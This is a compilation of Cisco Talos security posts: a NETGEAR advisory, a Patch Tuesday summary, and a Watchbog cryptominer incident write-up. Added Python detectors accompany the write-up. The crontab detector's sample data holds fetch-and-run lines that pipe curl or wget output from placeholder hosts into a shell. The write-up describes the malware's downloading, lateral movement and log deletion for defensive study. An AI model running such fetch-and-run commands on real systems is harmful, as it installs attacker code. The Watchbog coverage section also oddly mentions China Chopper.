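    """Return the behaviour tags that fire for one process-creation event."""
    if image_name(event["image"]) not in POWERSHELL_IMAGES:
        return []
    cmd = event["cmdline"]
    tags = []
    if len(cmd) > LONG_CMDLINE_THRESHOLD:
        tags.append("excessively-long-command-line")
    if ENCODED_RE.search(cmd):
        tags.append("encoded-command")
    if ENV_EXEC_RE.search(cmd):
        tags.append("script-sourced-from-environment-variable")
    return tags


def scan(events) -> dict:
    """Map pid -> tags for every event that fired at least one tag."""
    return {e["pid"]: tags for e in events if (tags := analyse_event(e))}


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The length check deliberately runs on the raw command line rather than on a decoded payload: the point of the "excessively long" signal is that it fires before any de-obfuscation, so a decoding failure cannot suppress it.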

Vulnerability Spotlight: Denial-of-service vulnerabilities in some NETGEAR routers


Dave McDaniel of Cisco Talos discovered these vulnerabilities.

The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely.

In accordance with our coordinated disclosure policy, Cisco Talos worked with NETGEAR to ensure that these issues are resolved and that an update is available for affected customers.



Vulnerability details

NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability (TALOS-2019-0831/CVE-2019-5054)

An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability (TALOS-2019-0832/CVE-2019-5055)

An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that the NETGEAR N300 WNR2000v5 router, firmware version V1.0.0.70, is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50040

Microsoft Patch Tuesday — Sept. 2019: Vulnerability disclosures and Snort coverage


By Jon Munshaw.

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated "critical," 65 that are considered "important" and one "moderate." There is also a critical advisory relating to the latest update to Adobe Flash Player.

This month's security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor. Most notably, this release contains another round of vulnerabilities in remote desktop services, the latest in a line of RDP bugs that are considered "wormable." Talos has already outlined how Cisco Firepower users can stay protected from the other series of RDP vulnerabilities known as "BlueKeep" and "DejaBlue."

Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here.

Critical vulnerabilities

Microsoft disclosed 19 critical vulnerabilities this month, all of which we will highlight below.

CVE-2019-1296, CVE-2019-1291, CVE-2019-1290, CVE-2019-0788 and CVE-2019-0787 are all remote code execution vulnerabilities in Windows Remote Desktop Protocol. An attacker can exploit these bugs by sending a specially crafted request to the target system's RDP service. If successful, the attacker could then gain the ability to execute arbitrary code. These vulnerabilities are pre-authentication and require no user interaction. These are the latest in a line of RDP vulnerabilities that have garnered attention for being "wormable," meaning an attacker could exploit these vulnerabilities and then spread malware from one machine to another easily.

CVE-2019-1257 and CVE-2019-1295 are remote code execution vulnerabilities in Microsoft SharePoint, a document manager and storage system. Some APIs in the software are exposed in unsafe ways, opening them up to exploitation if the user opens a specially crafted file. An attacker could exploit these vulnerabilities to gain the ability to execute code in the context of the SharePoint application pool and SharePoint server farm account.

CVE-2019-0719 and CVE-2019-0721 are remote code execution vulnerabilities in the Windows Hyper-V hypervisor. These bugs arise when the Hyper-V Network Switch on a host server improperly validates input from an authenticated user on a guest operating system. An attacker could exploit these by running a specially crafted application on a guest OS, potentially causing the Hyper-V host OS to execute arbitrary code.

CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298 and CVE-2019-1300 are remote code execution vulnerabilities in the Chakra Scripting Engine that arise when the engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these bugs to corrupt memory on the target system, and then gain the ability to execute arbitrary code on the victim machine. A user can only trigger these vulnerabilities by visiting an attacker-created website in Microsoft Edge or a malicious ad on another site. CVE-2019-1221 is similar to these vulnerabilities, only it exists in Internet Explorer's scripting engine.

CVE-2019-1208 and CVE-2019-1236 are remote code execution vulnerabilities in the VBScript engine that exist in the way the engine handles objects in memory. An attacker could exploit these vulnerabilities by tricking the user into visiting a specially crafted website in Internet Explorer. Additionally, they could embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that utilizes the Internet Explorer rendering engine.

CVE-2019-1280 is a vulnerability in Microsoft Windows that could allow an attacker to execute arbitrary code if they trick a user into opening a specially crafted .LNK file. If successful, the attacker could gain the same user rights as the local user.

CVE-2019-1306 is a remote code execution vulnerability that exists in Azure DevOps Server and Team Foundation Server when the software improperly validates certain inputs. An attacker could exploit this bug by tricking the user into opening a specially crafted file with a vulnerable version of the .NET Framework or Visual Studio. Additionally, the user could open a malicious attachment in an email. If successful, the attacker could execute code with the same rights as the current user.

Important vulnerabilities

This release also contains 65 important vulnerabilities, five of which we will highlight below.

CVE-2019-1214, CVE-2019-1215 and CVE-2019-1279 are elevation of privilege vulnerabilities in the Windows Common Log File System (CLFS) driver. An attacker could exploit these bugs to run certain processes with elevated rights. An attacker would need to log onto the target system first, and then run a specially crafted application. Information from Microsoft states that malicious users have already exploited these vulnerabilities in the wild.

CVE-2019-1216 and CVE-2019-1219 are vulnerabilities in DirectX that an attacker could exploit to see the contents of kernel memory on the victim machine, which could allow them to execute additional attacks. These bugs exist in the way DirectX improperly handles objects in memory.

The other important vulnerabilities are:

Moderate vulnerability

There is one moderate vulnerability, CVE-2019-1259, a spoofing vulnerability in Microsoft SharePoint.

Coverage

In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

These rules are: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 - 51483

Beers with Talos Ep. #61: Hacking for good is a bad idea



Beers with Talos (BWT) Podcast episode No. 61 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded Aug. 30, 2019: In this extra-sized episode, we cover a lot, starting with Retadup, and discussing the intricate workings of why it’s a bad idea to execute code on other computers without permission when you have no idea what that computer is doing. WannaCry is making some headlines again, but this time it isn’t WannaCry and, frankly, it’s not news. From the mobile ecosystem operating system battleground, Google’s Project Zero announced several vulnerabilities in iOS that have been discovered being exploited in the wild, with some of the exploit chains leveraging zero-days. The most important development of the week is that journalists are now quoting Matt's Twitter timeline and this will certainly end well.

The timeline:

• 01:30 — Roundtable: Telecasters, Joel requests drunk calls, what your Twix choices say about you.
• 15:15 — Retadup takedown: Let’s chat about running code on other people’s computers (hint: it’s a bad idea).
• 29:25 — WannaCry (but not really) is still a threat to things it’s already been hitting since forever. Surprise.
• 42:50 — Project Zero uncovers several exploit chains containing Apple/iPhone zero-day.
• 55:55 — Closing thoughts and parting shots.
==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)

Subscribe to the Threat Source newsletter

Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Watchbog and the Importance of Patching


What Happened?

Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.

This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.

There were some attempts at obfuscation, such as base64-encoding URLs and Pastebins, but the attack was still relatively simple to uncover: this attacker did not practice particularly strong operational security.

The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any "real" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the "positive" intentions of this adversary. Below is a message left on a compromised system by the adversary:

What does Watchbog do?

The Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant, we came across a post by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings, as we found an installation script that performs the following activities.

First, the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script terminates those processes using the kill command:

The script then uses the touch command to determine whether it can write to various directories on the filesystem.

It also checks the architecture of the system to determine whether it is executing on a 32-bit or 64-bit operating system, and then makes three attempts to download and install a 'kerberods' dropper using wget or curl.

Depending on permissions, the kerberods dropper is saved to one of the following directories:

• The current working directory
• /usr/bin
• /usr/libexec
• /usr/local/bin
• /tmp
• /usr/sbin

The script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID used by the attacker referenced in the Alibaba Cloud post mentioned earlier.

Though the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the XMR-Stak Monero miner.

The main part of the script checks to see if a process called 'watchbog' is running.

If the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture, and to execute it to begin the mining process.

'Testa' function

As previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64-encoded data to each of them.

The base64-encoded data is then decoded and written to various files.

The base64-encoded values correspond to the following:

• St_64: This variable contains the URL of the GitHub repository that hosts the XMR-Stak mining client.
  hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz

• con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client.
  hXXps://pastebin[.]com/raw/YJH8sWr

• Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but it likely contained an additional configuration file to be used by the mining client.
  hXXps://pastebin[.]com/raw/irzk5mSh

• poo_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but it likely contained an additional configuration file to be used by the mining client.
  hXXps://pastebin[.]com/raw/aJkbTx6Y

After downloading the encoded Pastebins to a text file and giving it execution permissions, the script starts the Watchbog process and deletes the text file. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function.

'download' function

The following code is associated with the 'download' function referenced by the installation script previously described. Similar to the 'testa' function, it contains three declared variables with base64-encoded assignments.

These base64-encoded strings correspond to the following:

• mi_64: This variable contains the GitHub URL that hosts the XMRig Monero mining client.
  hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz

• mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible.
  hXXps://pixeldrain[.]com/api/file/ZuVWceWG

• der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attackers' Monero wallet ID for the miner to use. This wallet ID is used to facilitate payment to the attacker: all Monero successfully mined by clients under the attacker's control is sent to the wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.
  hXXps://pastebin[.]com/raw/hURdMBLd

The download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system, installs the appropriate mining client and executes it to initiate the mining process.
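Much of the triage described in the 'testa' and 'download' sections comes down to recovering URLs from base64-encoded shell variable assignments. The Python below is an added example written for this page, not the incident's scripts or CSIRS tooling: it runs on a constructed stand-in script whose variable names mirror the ones above but whose URLs are placeholders, extracts every assignment whose value decodes to printable text, and defangs any URL it finds the way this write-up does (hXXp, [.]). Binary or non-base64 values are left alone rather than reported as garbage.

```python
import base64
import binascii
import re
import string

# Shell variable assignments whose value looks like base64 (quoted or not),
# e.g. St_64="aHR0..." as in the 'testa' and 'download' functions.
ASSIGN_RE = re.compile(
    r"""^\s*(?:export\s+)?([A-Za-z_]\w*)=(["']?)([A-Za-z0-9+/]{16,}={0,2})\2\s*$""",
    re.MULTILINE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def _b64(text: str) -> str:
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(text.encode()).decode()


# Constructed stand-in for a dropper script; the hosts are placeholders, not the
# URLs from the incident.
SAMPLE_SCRIPT = f"""#!/bin/bash
testa() {{
    St_64="{_b64('https://example.invalid/releases/miner-linux-cpu.tar.xz')}"
    con_url='{_b64('https://paste.example.invalid/raw/config1')}'
    poo_url={_b64('https://paste.example.invalid/raw/pool')}
    name=watchbog
    echo "$St_64" | base64 -d > /tmp/.st
}}
"""


def decode_if_text(value: str):
    """Decode base64 and return the text only if it is clean printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or any(c not in string.printable for c in text):
        return None
    return text


def extract_encoded_assignments(script: str) -> dict:
    """Map variable name -> decoded value for every base64 assignment that decodes to text."""
    found = {}
    for name, _quote, value in ASSIGN_RE.findall(script):
        decoded = decode_if_text(value)
        if decoded is not None:
            found[name] = decoded
    return found


def defang(url: str) -> str:
    """Render a URL the way the write-up above does so it cannot be clicked by accident."""
    return re.sub(r"^http", "hXXp", url, flags=re.IGNORECASE).replace(".", "[.]")


def decoded_urls(script: str) -> dict:
    """Variable name -> list of defanged URLs found in its decoded value."""
    return {
        name: [defang(u) for u in URL_RE.findall(text)]
        for name, text in extract_encoded_assignments(script).items()
        if URL_RE.search(text)
    }


if __name__ == "__main__":
    for name, urls in decoded_urls(SAMPLE_SCRIPT).items():
        print(f"{name}: {', '.join(urls)}")
```

Running the script over a real paste or dropper is the same call with the file contents in place of SAMPLE_SCRIPT; the 16-character minimum keeps short tokens and ordinary words out of the decoder.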




                The following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc.



                Lateral movement via SSH


                CSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability.

                The following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process.




                Lateral movement via Jenkins and Redis servers


                In addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target.

                Based on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests. It can provide attackers with RCE through particularly crafted URLs. A post by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy.



                Though the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.'



                As can be seen above, the payload variable contains a base64 encoded blob which is then decoded and written to the /tmp directory and executes it. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script.







                Persistence


Watchbog's main persistence mechanism appears to have been cron jobs. Below is the 'system' function from the 'kerberods' installation script, which ensures the dropper calls out to Pastebin every hour for new information. The screenshot below shows how Watchbog configures the cron jobs responsible for persistence on infected systems.
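As an added example (not code from the post or from the malware), the following Python script scans a crontab for the persistence traits just described: entries that run hourly, fetch from Pastebin, or pipe curl/wget output straight into a shell. The sample crontab, its hosts and the paste ID are constructed placeholders.

```python
"""Flag crontab entries with Watchbog-style persistence traits (added example)."""
import re
from dataclasses import dataclass, field

# Traits described above: a Pastebin fetch (plain or defanged host), a downloader
# whose output is piped straight into a shell, and discarded output.
PASTE_HOST = re.compile(r"pastebin(?:\[\.\]|\.)com", re.IGNORECASE)
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")
SILENCED = re.compile(r">\s*/dev/null")

# Constructed crontab; the paste ID and hosts are placeholders, not from the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
1 * * * * (curl -fsSL hXXps://pastebin[.]com/raw/EXAMPLEID || wget -q -O- hXXps://pastebin[.]com/raw/EXAMPLEID) | sh
0 * * * * wget -q -O - http://dropper.invalid/x.sh | bash > /dev/null 2>&1
"""


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def parse_cron_line(line):
    """Return (schedule, command) for a job line; None for blanks, comments and VAR=... lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^[A-Za-z_]\w*=", stripped):
        return None
    if stripped.startswith("@"):                     # @hourly, @reboot, ...
        parts = stripped.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = stripped.split(None, 5)                  # five time fields + command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def is_hourly(schedule):
    """True when the job fires every hour (hour field '*', or @hourly)."""
    if schedule == "@hourly":
        return True
    fields = schedule.split()
    return len(fields) == 5 and fields[1] == "*"


def scan_crontab(text):
    """Return a Finding for every job that shows one or more of the traits."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = []
        if PASTE_HOST.search(command):
            reasons.append("fetches from pastebin")
        if DOWNLOADER.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("pipes downloaded content into a shell")
        if not reasons:
            continue                                 # nothing suspicious, skip scoring
        if is_hourly(schedule):
            reasons.append("runs hourly")
        if SILENCED.search(command):
            reasons.append("output discarded")
        findings.append(Finding(line_no, schedule, command, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.schedule}] {'; '.join(f.reasons)}")
```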



In a post by Renato Marinho of Morphus Labs, he describes another very interesting way 'kerberods' achieves persistence. If it has root privileges, it downloads and loads a library into the operating system that hooks parts of glibc to modify glibc's behavior. The post also notes that the hooks allow the miner to run as any user (including root) and obfuscate both the network connection to the mining pool and the Redis/Jenkins server scans.

                Covering their tracks


Evidence deletion has been identified in previous Watchbog variants, and the variant in our incident continued this trend. It was performed in a clear manner, with files and logs being deleted or overwritten. The evidence deletion was typically appended to the end of a handful of the Pastebin scripts, the XMR-Stak download and SSH lateral movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible: we were able to rely on our client's centralized logging to fill in those holes, and the hosts themselves still held evidence, most obviously the malware variants themselves.

                Conclusion


Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and the network environment in which it is deployed. Once that foothold has been established, the attacker can connect to their C2, achieve persistent long-term access to the environment and spread laterally, which is exactly what happened in this case. The best way to prevent such activity is to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it is also important to have a maintenance window and a test environment to ensure that new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals: establish a baseline for internal network traffic and, if any significant deviations occur, identify and investigate them, even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization's SSH traffic.
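The baseline-and-deviation approach from the conclusion, applied to the SSH fan-out that the known_hosts lateral movement described earlier produces, as an added Python example that is not part of the original post. It reads constructed centralized connection records (the record format and all addresses are assumed), learns each source host's peak number of distinct SSH destinations per hour over a baseline window, and flags later hours that exceed it; since local logs were deleted in this incident, the input is the kind of centralized log the post relies on.

```python
"""Flag SSH fan-out spikes against a per-host baseline (added example)."""
from collections import defaultdict
from datetime import datetime

# Constructed centralized connection records (format and addresses assumed):
# "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port>". Days 1-3 are normal
# admin activity; on day 4 one host suddenly reaches many peers on port 22.
SAMPLE_RECORDS = """\
2019-09-01T10:00:12 10.0.1.5 -> 10.0.2.10:22
2019-09-01T10:03:40 10.0.1.5 -> 10.0.2.11:22
2019-09-01T11:00:00 10.0.1.7 -> 10.0.2.20:22
2019-09-02T10:01:02 10.0.1.5 -> 10.0.2.10:22
2019-09-02T11:00:00 10.0.1.7 -> 10.0.2.20:22
2019-09-02T15:20:09 10.0.1.5 -> 10.0.2.12:22
2019-09-03T10:00:55 10.0.1.5 -> 10.0.2.10:22
2019-09-03T10:04:17 10.0.1.5 -> 10.0.2.11:22
2019-09-03T11:00:00 10.0.1.7 -> 10.0.2.20:22
2019-09-04T03:10:01 10.0.1.5 -> 10.0.2.10:22
2019-09-04T03:10:02 10.0.1.5 -> 10.0.2.11:22
2019-09-04T03:10:02 10.0.1.5 -> 10.0.2.12:22
2019-09-04T03:10:03 10.0.1.5 -> 10.0.2.13:22
2019-09-04T03:10:03 10.0.1.5 -> 10.0.2.14:22
2019-09-04T03:10:04 10.0.1.5 -> 10.0.2.15:22
2019-09-04T03:10:05 10.0.1.5 -> 10.0.3.40:22
2019-09-04T03:10:05 10.0.1.5 -> 10.0.3.41:22
2019-09-04T03:12:00 10.0.1.5 -> 10.0.2.10:443
2019-09-04T11:00:00 10.0.1.7 -> 10.0.2.20:22
"""
BASELINE_END = datetime(2019, 9, 4)   # hours before this train the baseline


def parse_record(line):
    """Parse one record into (timestamp, src, dst, port); None if malformed."""
    parts = line.split()
    if len(parts) != 4 or parts[2] != "->":
        return None
    try:
        ts = datetime.fromisoformat(parts[0])
        dst, port = parts[3].rsplit(":", 1)
        return ts, parts[1], dst, int(port)
    except ValueError:
        return None


def ssh_fanout_per_hour(records, port=22):
    """Map (src, hour_start) -> set of distinct destinations reached on `port`."""
    buckets = defaultdict(set)
    for line in records.splitlines():
        rec = parse_record(line)
        if rec is None or rec[3] != port:
            continue
        ts, src, dst, _ = rec
        buckets[(src, ts.replace(minute=0, second=0, microsecond=0))].add(dst)
    return buckets


def detect_ssh_spikes(records, baseline_end, multiplier=3, min_targets=4):
    """Alert on hours at/after baseline_end where a source reaches at least
    multiplier x its own peak baseline fan-out (and at least min_targets hosts)."""
    buckets = ssh_fanout_per_hour(records)
    peak = {}
    for (src, hour), dsts in buckets.items():
        if hour < baseline_end:
            peak[src] = max(peak.get(src, 0), len(dsts))
    alerts = []
    for (src, hour), dsts in sorted(buckets.items()):
        if hour < baseline_end:
            continue
        # A source with no history gets a baseline of 1, so min_targets still applies.
        threshold = max(peak.get(src, 1) * multiplier, min_targets)
        if len(dsts) >= threshold:
            alerts.append({"src": src, "hour": hour.isoformat(),
                           "targets": len(dsts), "baseline": peak.get(src, 0)})
    return alerts


if __name__ == "__main__":
    for a in detect_ssh_spikes(SAMPLE_RECORDS, BASELINE_END):
        print(f"{a['src']} at {a['hour']}: {a['targets']} SSH targets "
              f"(baseline peak {a['baseline']})")
```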

                Coverage

                Intrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                Indicators of Compromise (IOCs)


                The following IOCs have been observed associated with Watchbog.

                Hashes (SHA256):


b383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61

0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a

                3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA

                Domains:


                aziplcr72qjhzvin[.]onion[.]to

                Misc:


                Monero Wallet (Same wallet as the Alibaba Cloud Post)

                47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7

                Threat Source newsletter (Sept. 12, 2019)


                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                You’ve heard it a million times: Always patch. But in case you needed another example that it’s important, Cisco Incident Response took a deep dive into a recent wave of Watchbog infections they observed. In this post, IR breaks down why this infection occurred, and what you can learn from it. 

                Speaking of patching, it’s as good of a time as any to update all of your Microsoft products. The company released its latest security update as part of their monthly Patch Tuesday. Check out our breakdown of the most important vulnerabilities here and our Snort coverage here.

Ever considered an “illustrious career in cybercrime?” Well, don’t do it. So says Craig on the latest Beers with Talos podcast, where the guys talk about “hacking back” and Matt’s level of Twitter fame.

                We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.


                Upcoming public engagements with Talos

                Event: “DNS on Fire” at Virus Bulletin 2019
                Location: Novotel London West hotel, London, U.K.
                Date: Oct. 2 - 4
                Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered that targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect the targets’ DNS records and discovered some SSL certificates registered for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                Location: Metro Toronto Convention Center, Toronto, Canada
                Date: Oct. 7 - 10
                Speaker: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Cyber Security Week in Review

                • Some states’ departments of motor vehicles are selling driver’s license data to private companies, including private investigators. Many individuals registering for licenses do not read data agreements that allow states to turn around and sell their personal information. 
                • Some Chromebooks mistakenly alerted users that the devices were reaching their end-of-life. A small number of brand new devices, after a reboot, told the user to upgrade to newer hardware to receive the latest security update. Google has since fixed this bug. 
                • A new report outlines the first recorded cyber attack on the U.S. power grid. North American Electric Reliability Corp. says it lost visibility into a small portion of its grid due to a “cyber event” in March. 
                • The popular Wikipedia site went down across Europe and the Middle East due to a series of denial-of-service attacks. The actor behind the DDoS kept up their efforts for about three days. 
                • The U.S. filed criminal charges against a professor in Texas for allegedly stealing information on behalf of Chinese tech company Huawei. The same person had already been named in a civil suit surrounding these claims. 
                • Apple’s reputation as having the most secure mobile operating system has taken a hit over the past few weeks due to multiple vulnerabilities being disclosed. Security researchers say the company may have put too much faith into its own code in iOS and the Safari web browser.  
                • New emails show that the U.S. Drug Enforcement Agency was close to purchasing malware from Israel’s controversial NSO group. But the agreement was eventually called off due to the high cost. 
                • UNICEF, a well-known non-profit organization, mistakenly leaked the personal data of more than 8,000 users who had accessed its online portal. The non-profit sent the information in an email to 20,000 users, after which they disabled the portal for a short time. 
                • A now-closed payroll processing firm withdrew millions of dollars from some New Yorkers’ bank accounts — and the CEO is nowhere to be found. MyPayrollHR alerted customers two weeks ago that it would be shutting down, and this week took back a month’s worth of pay from employees who worked for those customers. 

                Notable recent security issues

                Title: Microsoft patches 19 critical bugs as part of security update  
Description: Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated “critical,” 65 that are considered “important” and one “moderate.” There is also a critical advisory relating to the latest update to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor.
